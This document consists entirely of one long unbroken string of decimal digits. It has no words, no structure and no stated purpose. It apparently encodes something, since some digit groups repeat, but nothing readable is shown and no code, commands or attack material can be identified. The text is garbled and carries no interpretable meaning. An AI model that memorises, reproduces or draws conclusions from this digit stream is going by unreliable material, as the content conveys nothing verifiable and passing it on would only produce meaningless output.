084788716500808003191989501388733423042100428901227984301268419253514301510340258569901488927335500800959784444213101164435365346700011709798744001391346209089701454861979083300116728173930101226328538925400923973051181901035425660856101535562442967601434061055992100048974023575400433828697205700940073351696201409257287496500130909188498201105152805607501146850974618601646767231151600632547371236500878048373029200531277783562601183643490507800096463428062500486792718935300382767998967200674077076700200168713721704401269419874188500632547371236501127753231981700455150695374400097406296390400801556509839100860637262964300178197645915801416650036565000456984144044700829726199169000261767676781501675058041755500276140686173501295476968925801267019147035401400709114937001591627208364301489403245893001295476968925801267019147035400801556509839100096463428062500217673955801901656734087197500501251182573600552684965085301006744972845000914447367500901434246506527101628028383769100150038192815300853150258639300185168575013901065981713703600804729531596400066211423467001444848117588600539591080060200203221664303101144939057718600804729531596400260637035518300202686444156200745603478652400745603478652400965531702562801313710834757600804729531596401517468217887200145265770786200384734042151901391971820635000094013220292600748633924140101482933804833901517468217887200116728173930100400692793633800766260362584101293985914173100230497149604701186199849290800185168575013901272197402324300919621273456800174707630197400419855614085700013407182756200672666363679600358087886561601600725959736200633340183615601031706109617101423306635825301654225732240400714761244406101339146772249500743797255706700122165290114000339421812363801229367213751900916433793861800857422749974201379457918873801154167290936201484358600590400148308201610000606947222669000219192614772800268599210913000492404683493001625421516394301072796226037100909870404808300743365341350800794037296817700333040432935700177055035980400034310695559001150146221427600313469061087201231699089415700449000840380401038074839011700346085721668801342247707495400695317332634700498746174125401593098003532801263437576565100654076452813000504231573192300373893213737001273819318565901423450290818801543323550795300840078953171800885398755533700257098672259301543323550795300674077076700200510884968736400724085955124301297552222729301593586799087801507208515349100578072956278400582611857111100298903238958801657594688833700059144599827801454861979083301425162646882600202686444156200235895970664700020130453751001369563298498501481207874066400474806725923901614065563301500924434495966800154792562348801006966621049600660784641023300417756301360800846008544716501164737370095000434115573333600714761244406101309275114856100042872793889000206076673721701418925986709501372788283574301540115086130200632547371236501392127161226100432400235583200693605899757400388705407109501662407496425101554702055590900627792005287301667446916570300209947898195300865621568234101494833438066100804613949771300336783868272400339421812363801654197036860200996575755108700565427820934800441494260820700624511060354900790952107870001146850974618600566902829097700458141062700300491521545786400855177808492701517468217887200501251182573601396488578660600512819318835500371782683324201338577796492601654197036860200106683876854501535562442967600837425905726201245592057217600400692793633800185168575013901015138344328600202686444156201421239884468101275199383969000658331248283500846008544716500542111729587601624837286533800141355232762200683905058395500376288565993500801556509839100329413761605101287194568096000609307458562101517468217887200609307458562100693228194992201370769150758301339146772249500563155575653601338698133603400373019448880401424928695775000769305885604501313773226184000485979780858701434246506527101628028383769100804613949771300049682769446800295386756907100884123162560900398897197621001454861979083301264795724587200181781168968601412798843294401333350725531401556707604062801273819318565901608984644136601052084788716500804729531596400260637035518300202686444156200919562789393901517468217887200086840925525000719216779070701527081817842301587817495374900081893145046201004678193901101242451404801600977125554296300096463428062500481561071199000902639998027800272422961535400013407182756200919562789393901517468217887200203221664303100266841225734301113984060037201323521284563900474806725923900746283079989100800303856820901091236702240500822549440088701424928695775000960015135699800951495558412801416650036565000456984144044700303316881346301535050448225100185168575013900518548900823700534950955524400230920093604401241137750625600663872200586000417756301360800701820347996001450838483522800313469061087200747993502374100658331248283501016497134226501269419874188501328299696186901416650036565000745625506280001176303256611400748633924140100846008544716501541479622316101656734087197500894913070287100512819318835501600629510765700088752246420700193993410052801593586799087800501251182573601396488578660600512819318835501293985914173101123811427876900619448915418900665202477163400059144599827801339146772249500364555208829800533381981416900065293769968200734358812175500336783868272400339421812363801654197036860201494833438066100804613949771300171476651885800185168575013901333350725531401556707604062800504695716029700539591080060200024351335252001534521837393200384601352994100415994674874500298903238958800276140686173501041179679887800456984144044700429694926273500094198558471500376999780183001522726090876501249246086837601107817749358001655405476999300112599060791601215730852536201295476968925801081514910487800563382215223001071085303109500745603478652400745603478652401246387899535500059144599827801454861979083301425162646882600202686444156201114179097989500011709798744000811464219878401675938226680601342247707495401189194885133800384601352994100415994674874501372841732005700976872255114901339146772249501242451404801601211168962633300036081908532500376288565993501094112916220200743657727421901333350725531400339421812363801169002046808100364000090323701277900254242500376288565993500279900672325101268152273743301543323550795300116728173930100114508694527301295476968925800024351335252000217673955801900415637675202901320386054784800800303856820900148308201610000985778754772900762121975194001434246506527100738415926027100881204803763400412927489443900081893145046200751530885615300289433611227701403811386076200474806725923900701820347996000954805729193801423450290818801543323550795300857422749974201423450290818801543323550795300840078953171800683905058395500376160931121101295129138449600433828697205701019201269711700680698652205200119549347727901340577240526201304622852781800501251182573600101755961688001146850974618600566902829097701189194885133800996602331502900584317564144601015119129618700177055035980400940073351696201192941133290401107817749358001157390855127600132162786555901328299696186900158074247433700433828697205700421667635288901416650036565000456984144044701516811944381901076273607848201198829339749600806620523736700082956486951200011709798744000811464219878400162919830824300634164460257000024351335252001506276116256101273819318565901608984644136600234419804955601152803342651400803657545306300313469061087201231699089415701007517338312300307623582225500952188000998200136728028375601339146772249501665774887472500663872200586000371101511745500654076452813001493275444681300235895970664700020130453751001369563298498500202686444156200008894964483301283538174553401541479622316100270052172593201508634892660401525530039235400946637177692600133429374391301665774887472500663872200586001277900254242500376288565993500449000840380400435844834316801507151089784100193993410052800808003191989500003657655808100501251182573600552684965085301006744972845000914447367500901545940487527301381170776337501174899257477601541479622316101532382496388300474340708504400358087886561601517468217887200965531702562801313710834757600804729531596401517468217887200609307458562101517468217887201324559822660600842378973031000545420188818901197365000041800136728028375600790438035205201261446935222900904491175566400441793086078601484358600590400619899597608100096463428062501084413883425500219192614772800034310695559001545940487527300952768828893101532356652341200289433611227701403811386076200965531702562801313710834757600804729531596401517468217887200433353986715101532382496388300474340708504400358087886561601517468217887200563382215223000795927465285001534521837393200384601352994100415994674874500501251182573601164586663421000217673955801900303594609223200431026765308901675938226680600582611857111101494833438066100804613949771301382953302227501123811427876900619448915418900148308201610001193614377133200898211870581300024131188842701293985914173100203221664303100891859093714700111502271074600857422749974201563273892251900449048430917000853150258639301295775335851101479633112508401291674042162201196333064450701441747320731600154792562348801191897760568200457101385444001155897797229100870164240896200586660591519401627472694842200168713721704400498718290803301545940487527301155833182625801114773366500400856576665865700684840497722701292232106696800059144599827801339146772249500975323677823500743657727421901339146772249501436542516735200437380541045900133429374391301441747320731601400709114937000808003191989500003657655808100029421655869001052198714569901367453730491800217673955801901656734087197501264795724587201527081817842301587817495374900081893145046200588860875182800762121975194000684840497722701292232106696800059144599827801339146772249500196320034425000555376730180301545940487527301028083608835601582103224661001586227263589401264228528182500975323677823501295129138449600433828697205700458141062700301624907990486001062945307052801543416866956500398038628956300206387364822700989509417126300101755961688000049639193179800279900672325101268152273743301543323550795300988169068122200236527826680301436542516735200437380541045900133429374391301654197036860201339146772249500769305885604501313773226184000485979780858700298903238958801672235190958200162919830824301532382496388300474340708504400358087886561601517468217887201326367130707001617472228491400978996573543400894913070287100817197362482301523650460838401648708723078201479805039043701506276116256101245592057217600746283079989101293985914173101577793956898701031706109617101293985914173100230497149604701028620015850600330448794772400751161465872000429676877505101543416866956501424928695775000914447367500901603453199579000946637177692601283052504118700849185595800800683905058395500376288565993501324559822660600842378973031000545420188818900449000840380400212862833940100185168575013900538102727369400185168575013900387618266749100627792005287300504231573192300373893213737001273819318565900431026765308901556707604062800620068022811600693051520561800530399431801600681874101571500932755235572801600629510765700059144599827801454861979083301425162646882600202686444156200914447367500901603453199579000684840497722700538347553304100341695687396500931421401422600487206900635000202686444156200431026765308900148851484396201402509492508700346085721668801556707604062801485147377661200822062867100200307761204761501058691911274900687888286223501114179097989500677682630477201060394153937601252929765556600339421812363801613652765156101323521284563900959689187985300900364008030500501251182573600031357374130501087087579390100881204803763400412927489443900081893145046200956769709442800985778754772900762121975194001264795724587200181781168968601412798843294401295129138449601600725959736200816764766225100482445572502100253732912771701454861979083300857422749974200475585151099801525530039235401438274608369000985778754772900762121975194001264795724587200563382215223001071085303109501436542516735200437380541045900133429374391300544642778869300404840386635000015750224544800364555208829801667446916570301097851380510500055579310910300588860875182800855177808492700298903238958800971661863196900684538439096401001292765454400036081908532500376160931121101665774887472500663872200586000930782279292300945787653330500373019448880401417751668764600396392883247800507709219650101416650036565001370769150758301339146772249501372788283574301540115086130201264228528182500670517143258901231699089415701042793838875600714616394458200921958752339401293985914173101375794005232000402810988858201293985914173101123811427876900619448915418900619899597608100860637262964300178197645915801577793956898700545420188818900609307458562100952188000998200902639998027800272422961535400745898674098400683905058395500376160931121100790952107870001146850974618600566902829097700313469061087201231699089415700336783868272400339421812363801654197036860201520361961151600025681255430601372788283574301540115086130201370692488514300487206900635000202686444156201114179097989500940073351696200043865844183900010589294066800959526622195300816351119307801595256297474101339146772249500400692793633800778656573624001425358114472501507151089784100455150695374401339146772249500133429374391300639770406511701242451404801600474806725923901600629510765700560540993980500952768828893101454861979083300894913070287101295476968925801264228528182500155847344766800050778735345300707024420090900318998915806500904491175566401525530039235400318418071516800632547371236500170094763690300816764766225100729540254353701028620015850600371782683324200382767998967200674077076700200168713721704401333350725531400339421812363801318747646266701228325316456301295775335851100524297510900901479805039043700701820347996000482445572502100441338037670400402907464144600707024420090901579027146565700794037296817700289408610807000039416841469701527109601799601324559822660600013662484812101304622852781800449000840380401038074839011700680698652205201191897760568200457101385444001442292991548201323521284563900336783868272400339421812363801654197036860201391971820635000094013220292600449048430917000804729531596400260637035518301291983314150601177731405087000538347553304100341695687396500931421401422600487206900635000202686444156200919562789393901320386054784801307696256240900724085955124300280916374605200665202477163400136728028375601154167290936200600262782417001192941133290401107817749358001150146221427601545940487527301381170776337501174899257477601309275114856101608984644136601224646884541001318747646266701295476968925801447700982741600579624497503500796560484928800912604313568301489403245893000556791161388500124694905223900766260362584100632547371236500415637675202901320386054784801094112916220201152803342651400803657545306300504231573192300373893213737001273819318565900538102727369400185168575013900219829849383000790952107870001146850974618600566902829097700412858598452401196333064450700870164240896200586660591519401545940487527300952768828893101293985914173101342247707495400702532846784700108863458084701550541272748601123811427876900619448915418900436651064326200898211870581300822062867100200270616550086601155485374752200114508694527301295476968925800024351335252000364000090323700234419804955600088752246420701293985914173100230497149604700214333749038400745625506280001176303256611401370692488514300495836789564300398698935383000890246804487900884123162560900398897197621001454861979083300946637177692601283052504118700693605899757400215387768345300298903238958800217711846910100314729751661001556506228272601439743491672701339146772249500482445572502101527059084532501231699089415700959689187985300900364008030501150146221427600474806725923900715538351531500600262782417001382202692452900790438035205201086971604133000259575700246101015138344328600202686444156200431026765308901113984060037201323521284563900298903238958801672235190958201423306635825300452822702421801196082423928801015435650211800904878357078500154792562348801356307218710701480634062030200816764766225100804729531596401339146772249500124694905223900745603478652401391971820635000094013220292600632547371236501532382496388300474340708504400358087886561601517468217887200865621568234100518473153963500624511060354901563273892251901293985914173100582611857111100504231573192300373893213737001273819318565901423450290818801543323550795300857422749974201114179097989500066211423467001444848117588600539591080060200230497149604700724085955124301541479622316100155012636405001418925986709500219829849383000388705407109500653815307954000447367425012600150626828498701630929741028800822549440088700729540254353701028620015850601293985914173100449982914570000940073351696201382953302227500929583851742300425475498510400707024420090900266841225734300086840925525001390237903788200882008870197400978996573543400540194151750600545420188818900938996956427001340577240526201304622852781800371101511745500881988335967900253866128558000200608865611101423450290818801543323550795300857422749974200804613949771300049682769446801273819318565900387618266749100441793086078601484358600590401664981697895201031706109617100332853795991600684538439096401264228528182500909989313546500004692668326900171476651885800185168575013901564369128793900766260362584100748633924140101437652609630301667446916570301282515198178101108227747501400658331248283501269419874188501001292765454401593198590310700817197362482301150146221427600796560484928800207036747311500857422749974200812246962301100206048060541001450838483522800959689187985300546690188220901335199002940100208620541474901295775335851101479633112508401094112916220200853150258639300945517385352201307841312816900150038192815300853150258639300185168575013901242451404801601108299196936200219829849383000482445572502100132162786555901582103224661001586227263589401600629510765701152803342651400803657545306300336783868272400339421812363801654197036860200684840497722700059144599827801454861979083301425162646882600202686444156201473942096437600335844720910801470617170434001665897509595800034310695559000668286344455401065180468913001291674042162200136728028375601434431731660001393249234250100346085721668801188537228237800406551205357200367733112613301543416866956501333350725531400203221664303101563273892251900371782683324200382767998967200674077076700200168713721704400388705407109500296656657793001535050448225100185168575013901424928695775001435548344888901266368348565401532382496388300474340708504400358087886561601517468217887200946637177692600133429374391300978996573543400540194151750601579732819697501247642581035001146167250701600487206900635000202686444156201261446935222900904491175566400441793086078600524297510900901479805039043700701820347996000714616394458200779362387637501517468217887200794037296817700959784444213100940073351696200677682630477201060394153937601252929765556600230497149604700253936483648100743797255706700122165290114000284284176120000665202477163401535050448225100185168575013900133429374391300974627408906400857422749974201417751668764600396392883247801144939057718600902639998027800272422961535400013407182756201563273892251901224646884541000011709798744000811464219878400162919830824300921084472101300954805729193800914447367500901603453199579001545940487527300203541348405201328299696186901191897760568200457101385444001126803625609000930782279292300945787653330501322175280391400855177808492701246387899535500853150258639301297552222729300808003191989500003657655808100279900672325100295386756907101004896565977100693605899757400978996573543401534521837393200456984144044700822549440088701420957019563800101755961688000422813900638800855177808492701507208515349100578072956278400582611857111100894913070287101381170776337500486407911714100548591838036700376288565993500938535429525101603919280939301675938226680601556707604062800620068022811600736979083041701155485374752200114508694527301295476968925800024351335252001084413883425500092660185488400868434975503101527081817842301587817495374900081893145046200657333749183601591627208364301264228528182501450838483522801022219611829400833804770242000756225527908501520361961151600025681255430600919562789393901320386054784800154792562348800699794952341501283052504118700766260362584100066404497751300279900672325101273819318565900761370201884300965531702562801313710834757600804729531596401517468217887200371101511745500563155575653601338698133603400325777750243501342247707495401246387899535500806620523736700082956486951201150146221427600298903238958800429694926273500083849109711901129491676341100013407182756200658331248283501435548344888900053171009143101283052504118700766260362584100066404497751301328299696186901228325316456301307841312816901242451404801600704136897358901060858030944301264795724587200181781168968601412798843294400881988335967901541479622316100214702329456000053171009143100096463428062500510884968736401031706109617101293985914173101087693337357600266841225734301193614377133200376288565993500938535429525101603919280939300744816811119201283052504118700766260362584100066404497751300417756301360800846008544716500253866128558001225317099411401031706109617101293985914173101342247707495400930782279292300945787653330501629081126192600565427820934800441494260820700624511060354900150038192815300853150258639300890246804487900600262782417001382202692452900790438035205201423450290818801543323550795300857422749974200215387768345301535562442967600139969482457301031706109617100449048430917000902639998027800272422961535400013407182756201286703237841500766260362584100632547371236500719216779070701667446916570301282515198178101108227747501401372788283574301540115086130201489403245893001091236702240500822549440088700100735779374300474340708504400358087886561601517468217887201042793838875600714616394458200921958752339400193993410052801671162530756200482445572502100132162786555901042793838875600714616394458200921958752339400632547371236501656734087197500116728173930100114508694527301295476968925800024351335252001084413883425500449982914570000865621568234101393249234250100345522672152901421817069325901381170776337500158074247433700433828697205700421667635288900033822038457401121859619323500235895970664700371101511745500538102727369400185168575013900482445572502100441338037670400402907464144600707024420090901286042306074700846008544716500542111729587601624837286533800790438035205201258272899005501049316065429301141052318039601086971604133000259575700246101382186353154100927223333672701339146772249501015119129618700177055035980401007517338312300307623582225500053171009143100565427820934800441494260820700624511060354900100735779374300474340708504400358087886561601517468217887200988169068122201211455727471101563273892251901402509492508700253936483648100743797255706701007517338312300307623582225500102614601586200289433611227701403811386076201103364192119200816252135669100751161465872000351288430218701281633624014500376288565993501007517338312300855177808492701535562442967600139969482457300212862833940100185168575013900954805729193801286042306074701564369128793900766260362584101600629510765700853150258639301018521663415201273819318565901608984644136600606947222669001113984060037201323521284563901007517338312300307623582225500053171009143101441843438443201333350725531401416650036565000808003191989500003657655808100996575755108701245592057217600400692793633800185168575013901439743491672700542654393932101060858030944300865621568234100682547751365200853076132436401447700982741600579624497503500145265770786200384734042151901391971820635000094013220292600748633924140101482933804833901517468217887200116728173930100400692793633800766260362584101293985914173100230497149604701186199849290800185168575013901272197402324300919621273456800174707630197400419855614085700013407182756200672666363679600358087886561601600725959736200633340183615601031706109617101423306635825301654225732240400714761244406101339146772249500743797255706700684840497722700059144599827801454861979083301425162646882600202686444156201114179097989501277900254242500376160931121100482445572502101527059084532501231699089415700996575755108701245592057217600400692793633800185168575013900881988335967900280916374605201446487938400700491648744972200804613949771300930782279292300763231454373701541479622316100342323733073201290090244961000914447367500901545940487527301155833182625801402509492508701186199849290800253866128558001225317099411400212862833940100185168575013901286703237841500766260362584101197365000041801095971534132701038994022218800086840925525000214702329456001356307218710701342247707495400644704396404701068575186511200517714128042801627472694842200168713721704401129785816901600679363066710300415451369979100383866983384201339146772249500834482360758400855177808492701263437576565100654076452813000412858598452400257098672259301543323550795300674077076700200364000090323701228325316456301307841312816901136557393224200455150695374400097406296390400538476553175700452822702421801196082423928800222832624603401095971534132700148627794310601443050528615101102583666500801211216140664601263515721120701333858411096701545940487527301028083608835601328299696186901318747646266701191897760568200457101385444001463427784036901370769150758301339146772249500670517143258901231699089415700940073351696200449000840380400435844834316801507151089784100193993410052801228325316456301339146772249500475585151099801525530039235400473507408445900004692668326901274686385207501527081817842301587817495374900081893145046200875330257907300902639998027800272422961535400745898674098401017472113176501507002791096400155847344766801157390855127600452217309026601674937958109500261767676781500959689187985300900364008030501545940487527300952768828893101532356652341200808003191989501231699089415700155784641778901264795724587200681874101571500932755235572801532356652341200266841225734301370692488514301454047390283001256754053298201234169883868000051743937593101323521284563900794037296817700324774196555500059144599827801339146772249501015138344328601291983314150600881204803763400412927489443900081893145046201483428709984900898211870581300822062867100201543416866956501424928695775001441747320731601395653541614400855177808492701624907990486001062945307052800270616550086600223041071579901095971534132701440651863247801052084788716500059144599827801339146772249501086971604133000259575700246101379457918873801339146772249501564369128793900766260362584101114773366500400660784641023301108227747501400954805729193801389383047261501450838483522800295386756907100457488509887700779362387637500868496463913800857422749974200219829849383001228948800144601618702482102200088495634579500043865844183900746283079989100632547371236501390237903788200882008870197400769305885604501313773226184000485979780858700501251182573600031357374130501524453310374301242451404801600206048060541000133429374391300482445572502101527059084532501231699089415700474806725923900701820347996000790952107870001146850974618600566902829097701264795724587201007517338312300855177808492700268599210913001241137750625600663872200586000988169068122201314442831281201484358600590400217711846910100816764766225100015750224544800364555208829801277900254242500376288565993501382953302227501342247707495400681874101571500961967918846000744816811119200266841225734300086840925525000415637675202901320386054784801094112916220201483010135178500350111660339800065295817213500582611857111100279900672325101529569124908900865621568234100473507408445900004692668326901274686385207500043865844183900746283079989101532356652341200304956312188701454861979083300857422749974200431026765308900086840925525000878048373029200531277783562601293985914173100855177808492701338698133603401324559822660600842378973031000545420188818901402509492508701031706109617100632547371236501535852334093000431026765308900148851484396200748633924140100261767676781501535562442967600356913266601800916433793861800857422749974200891859093714700111502271074600840078953171800457488509887700779362387637500868496463913800857422749974201493311031079100806620523736701335199002940100406551205357200367733112613301543416866956500544642778869300743392739806201535562442967601550541272748600929583851742300425475498510400707024420090901654197036860201339146772249500482445572502101527059084532501231699089415700794037296817701238538640711600342323733073201290090244961000914447367500900029421655869001052198714569901367453730491800364000090323701169002046808100389957690301601076273607848200373019448880400431026765308901556707604062800504695716029700539591080060200024351335252000486792718935301323521284563900504231573192300373893213737001273819318565901450838483522800460187500342101120652525045700501251182573601164586663421000510884968736400724085955124300253866128558001052084788716500804729531596400260637035518300202686444156200769305885604501313773226184000485979780858700417756301360800846008544716500701820347996000960015135699800951495558412800284284176120000148308201610000734336739102400609307458562100393576719237901543323550795301065204937100200295386756907100687888286223501114179097989500695317332634700498746174125401441747320731600822549440088701313710834757601146850974618600566902829097700268599210913000681874101571500961967918846000956769709442800200608865611101420957019563800101755961688001193614377133200119549347727900266841225734300632547371236500303594609223200431026765308901675938226680601630547059370001454861979083300857422749974200228871841388101362918883544501664981697895201186199849290800048974023575401563273892251900371782683324200513770356886400857422749974201579027146565701655405476999300616742068463400795927465285000940073351696200433353986715100719216779070701042793838875600628191424677500990717899372700433828697205700504231573192300373893213737001273819318565901283052504118701535562442967601550541272748600929583851742300425475498510401469670593083700884123162560900398897197621001454861979083301150146221427601095406555384700939183300233900959689187985300900364008030500695317332634700498746174125401382186353154100927223333672701339146772249500298212464678800459910540285200890246804487900683905058395500376288565993500940073351696201157390855127600452217309026601674937958109500314729751661001328299696186900693228194992200384601352994100415994674874500458141062700300417756301360800846008544716500701820347996000482445572502100132162786555900702532846784700108863458084701575192070819400846008544716500048974023575400431026765308901270947728316400860637262964300178197645915800606947222669000219192614772800501251182573600552684965085301006744972845000914447367500900034310695559000699794952341501283052504118700766260362584100066404497751301103364192119200816252135669100751161465872001242451404801600816351119307800096463428062501384249879123901295476968925801267019147035401400709114937000384601352994100415994674874500491521545786400855177808492701517468217887200946637177692600133429374391300150038192815300853150258639300185168575013901269419874188500632547371236500878048373029200531277783562600193993410052801370769150758301339146772249501441747320731600822549440088701349341137642400566902829097700298903238958800276140686173501295476968925801267019147035400154792562348800203221664303101072796226037100909870404808300743365341350800298903238958800217711846910101256754053298200081254177605800615544855255900946637177692600133429374391301247642581035000203063875529701372889025530100162919830824301656734087197500406684497234301479805039043700701820347996000351288430218701281633624014500376288565993501627472694842201320701744408700371101511745500235895970664700020130453751001369563298498500202686444156200743657727421901339146772249501141678075507501254700394242401183643490507800825322542030800734358812175501545940487527301155833182625801293985914173101188537228237801665774887472500663872200586000547061235684701273819318565901608984644136601416650036565000808003191989500003657655808100512349826042901196082423928800501251182573600101755961688001146850974618600566902829097701545940487527301155833182625800632547371236500155012636405000628191424677501535562442967600970707572313401152803342651400803657545306300644704396404701068575186511201007517338312300855177808492701535562442967600779911347543401591627208364301231699089415700298903238958800429694926273500214702329456000693228194992200384601352994100415994674874501627472694842200168713721704401016497134226501269419874188500548591838036700931421401422600487206900635000202686444156201654197036860201339146772249500124694905223900745603478652400517714128042800417756301360800944013654439200518473153963500624511060354901066472795746400277699294950700548591838036700376288565993500938535429525101603919280939300956769709442801324559822660600842378973031000545420188818901197365000041801273819318565901608984644136600203221664303100482445572502100253732912771701454861979083300857422749974201563273892251901293985914173101375794005232000170094763690300816764766225101429243754134401304197010515800988169068122201211455727471101297552222729300456984144044700800303856820901295476968925801267019147035401400709114937000384601352994100415994674874501215730852536201295476968925801081514910487800959689187985300900364008030500473507408445900004692668326901274686385207501277900254242500376288565993500460187500342101120652525045700609307458562101538387231958300384734042151900959689187985300546690188220901109902896360900644704396404700141378984763000586660591519400695317332634700658331248283500431026765308900203221664303101141678075507501254700394242401293985914173101375794005232000155012636405000628191424677500517714128042800069681500308200029436631286701339146772249500881988335967900760594335563401121859619323500235895970664700794037296817700324774196555500059144599827801339146772249500639770406511700274675441052000884123162560900398897197621001454861979083301042793838875600714616394458200921958752339401183643490507800329413761605101287194568096000406684497234301479805039043700715538351531500176940140280501337789880137901550541272748601630547059370001454861979083300857422749974200219829849383000388705407109501553567159396101273819318565901608984644136600527918670405900278324870422800302769047558700460187500342101120652525045701263437576565100654076452813000988169068122201287194723634900069681500308200029436631286701339146772249501114179097989500313469061087201231699089415700787220537362300512349826042900472856000181400035846428646400909989313546500004692668326900702532846784700108863458084700595629790960600214702329456001356307218710700855177808492701338698133603401545940487527300203541348405200695317332634701470617170434001264795724587200894913070287100512819318835500193993410052800456984144044701591359351532501443050528615101102583666500800171476651885800890246804487901017472113176500952768828893101293985914173101052084788716500902639998027800272422961535400013407182756200538102727369400890246804487900206387364822700989509417126300101755961688000049639193179800474806725923900746283079989101307696256240900346085721668801630547059370001454861979083300857422749974200544642778869300404840386635001160364863185100819835017886900046637866430301450838483522800501251182573601396488578660600512819318835500371782683324201323521284563901372841732005700976872255114901154167290936201484358600590400271413627275100304956312188701454861979083300857422749974201016497134226501269419874188500517714128042800560939390372800714761244406100185168575013901473942096437600335844720910801234169883868000051743937593101323521284563900609307458562100053171009143100434115573333600714761244406101297552222729301370769150758301154167290936200687888286223501114179097989500940073351696201192941133290401107817749358001095406555384700939183300233900518473153963500268909839836200609307458562101318747646266700985778754772900703229923606700011709798744000811464219878401603374057404500853150258639300945517385352201307841312816901541479622316101656734087197500268599210913000501251182573600552684965085301006744972845000914447367500901095406555384700939183300233900417756301360800944013654439200501251182573601396488578660600512819318835500445620023026300762121975194000959689187985300900364008030500695317332634700498746174125400670517143258901283052504118700893878566660201150146221427600681874101571500961967918846000996581711468300212862833940100185168575013900743657727421901340577240526201541479622316101656734087197500865621568234100702532846784700108863458084701294976612590500855177808492701447700982741600579624497503501507208515349100578072956278400582611857111100406684497234301479805039043700701820347996000431026765308901577793956898700816764766225101242451404801600450410135090000170094763690300816764766225101086971604133000259575700246100790952107870001146850974618600566902829097700313469061087201231699089415700412858598452400257098672259301543323550795300674077076700201084413883425501630547059370001454861979083300857422749974200812246962301100396742215227400816764766225100654076452813001493275444681301286703237841500766260362584101264228528182501086971604133000259575700246101421239884468101275199383969000658331248283500743657727421901339146772249500100735779374300474340708504400358087886561601517468217887200433353986715101535852334093001072796226037100909870404808300743365341350801277900254242500376160931121101086971604133000259575700246101015119129618700177055035980401522726090876501249246086837601107817749358001600725959736201579732819697501382186353154100927223333672701339146772249500881988335967900065295817213500855177808492701338698133603401438274608369001245592057217601141052318039600406551205357200367733112613300715495763002400959689187985300900364008030500930782279292300945787653330501322175280391400855177808492701042793838875600714616394458200921958752339400632547371236500719216779070700946637177692600133429374391301439743491672700844769867845300266841225734300632547371236501656734087197500609307458562101538387231958300384734042151900930782279292300763231454373701541479622316100634164460257000024351335252001084413883425501553567159396101493275444681301450838483522800295386756907100600262782417001192941133290401107817749358001150146221427601545940487527301381170776337501174899257477601309275114856101608984644136601224646884541001318747646266701295476968925801447700982741600579624497503500796560484928800912604313568301489403245893000556791161388500124694905223900766260362584100632547371236500634164460257000024351335252001384249879123901591627208364301231699089415700609307458562100693228194992201554702055590901418925986709501593098003532800313469061087200747993502374101234169883868000773681487057700817197362482300298903238958800619899597608100860637262964300178197645915800606947222669000959784444213101382953302227500561629038935100092660185488400868434975503100011709798744000811464219878400162919830824300094198558471500518548900823700534950955524400230920093604401393249234250100396742215227400545420188818900547061235684701196333064450701071750925032601507151089784100586660591519400988169068122200526711694146401313710834757601146850974618600566902829097700865621568234100417756301360800846008544716500507709219650101270947728316401595256297474101339146772249500761370201884301535562442967600356913266601800452822702421801196082423928800794037296817700959784444213100433353986715100083849109711901129491676341100013407182756201295129138449600930782279292300763231454373700048974023575401071750925032601507151089784100586660591519401372841732005700976872255114901339146772249501295129138449600433828697205700940073351696201382953302227500092660185488400868434975503101150146221427600458141062700300449000840380400212862833940100185168575013900351288430218701281633624014500376288565993501211261636242900095660429894500972134575196400436300256734001076273607848200373019448880401436542516735200437380541045900133429374391301420957019563800101755961688001270947728316400266841225734300234419804955600853150258639300945517385352201307841312816901234169883868001308847506453400235895970664700946637177692601283052504118700693605899757401333350725531400339421812363800606947222669000959784444213101211261636242900095660429894500972134575196401297552222729301228325316456301154167290936200206387364822700989509417126300101755961688000049639193179800171476651885800185168575013901136557393224200455150695374400097406296390400154792562348801169002046808100046637866430300954805729193800743657727421901340577240526200961746029005900088752246420700632547371236500402810988858201224646884541001169002046808101506276116256100620068022811600762833322285900681874101571500932755235572801293985914173100929583851742300425475498510400707024420090900743657727421901340577240526200507709219650100203221664303100736828408139901514237980031300986079483983600729540254353701028620015850601489403245893001091236702240500429694926273501645954401158900701820347996001349341137642400566902829097700644704396404701068575186511200171476651885800185168575013901295129138449600473507408445900004692668326901274686385207500547061235684701196333064450701564369128793900766260362584101293985914173100449982914570000474806725923901614065563301500924434495966800429694926273500054970590442401655987830530701272197402324301432627616156001188190694710500520920666518600081893145046200172241730348400043865844183900325777750243500907250933124601264795724587201545940487527300505738510593501339146772249501450838483522801273819318565901160364863185100819835017886901506276116256101273819318565901608984644136600086840925525001532382496388300474340708504400358087886561601517468217887200609307458562100075207432484700314729751661000371101511745501066472795746400277699294950701667446916570301282515198178101108227747501401188190694710500520920666518600081893145046200172241730348400865621568234100794037296817701276995997135301370769150758301154167290936200600262782417001192941133290401107817749358001150146221427601545940487527301381170776337501174899257477601309275114856101608984644136601224646884541001318747646266701295476968925801447700982741600579624497503500796560484928800912604313568301489403245893000556791161388500124694905223900766260362584100632547371236500303594609223200111502271074600857422749974200133429374391300518548900823700534950955524400230920093604401324559822660600068430039003400865621568234100518473153963500624511060354900974627408906400857422749974200186284908044700131007152643900940073351696201324559822660600013662484812101304622852781800417756301360800846008544716500253866128558000474806725923900701820347996000736828408139901514237980031300966927070305800501251182573601164586663421001506276116256101493275444681300431026765308900203221664303101636617111812900663872200586001655405476999300112599060791600222832624603401095971534132700486792718935301372889025530100996581711468301031706109617101264228528182501420957019563800101755961688001270947728316401441843438443200387618266749101418925986709500376999780183000938996956427000289433611227701403811386076201324559822660600842378973031000545420188818901224646884541000734336739102400412858598452401196333064450700642089479341801439743491672700041878394053601493311031079100806620523736701335199002940100431026765308901113984060037201338577796492601049148854637300501251182573600031357374130501524453310374301129785816901600679363066710301400709114937001591627208364300632547371236500170094763690300816764766225101593098003532800609307458562101517468217887200474806725923900715538351531500223041071579901095971534132701428745683967601543323550795301065204937100201273819318565901473942096437600335844720910800658331248283501016497134226501269419874188500996575755108700096463428062501186714688219500278324870422800302769047558700681874101571500648575234734900332853795991600916433793861800857422749974201114179097989500699794952341500377059764773800743797255706700946637177692600133429374391301450838483522801273819318565900351288430218701281633624014500376288565993501189194885133800384601352994100415994674874500695317332634700658331248283500295286161795000066211423467001444848117588600539591080060201577793956898701256754053298200217673955801900170094763690300816764766225101563273892251900748633924140100545420188818901150146221427601627472694842200168713721704400186556577083101242451404801601064246586798700668286344455401065180468913000800303856820900837425905726201441843438443200773574102039501291983314150601017472113176500952768828893101224646884541001494833438066100804613949771300940073351696200458141062700301157390855127600452217309026600875330257907300902639998027800272422961535400013407182756200431026765308901556707604062801196333064450701579027146565700449000840380400212862833940100185168575013901065981713703600804729531596401545940487527300203541348405200529381043033800278324870422800302769047558700946637177692600133429374391301295129138449600433828697205700946637177692601049148854637300796560484928800207036747311500857422749974201473942096437600335844720910800658331248283501439743491672700786490475396100921084472101300954805729193801114